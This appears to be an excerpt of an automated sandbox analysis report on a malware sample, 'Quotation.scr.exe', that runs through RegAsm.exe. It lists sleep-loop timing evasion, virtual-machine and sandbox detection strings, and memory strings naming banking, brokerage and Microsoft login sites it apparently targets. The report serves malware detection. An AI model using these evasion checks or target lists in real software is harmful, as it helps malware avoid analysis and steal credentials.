                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 2240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 43E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7973Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1884Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5664Thread sleep count: 7973 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5664Thread sleep count: 1884 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599324s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597342s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594515Jump to behavior
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.00000000005C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4572806389.00000000010AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{P+"I
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
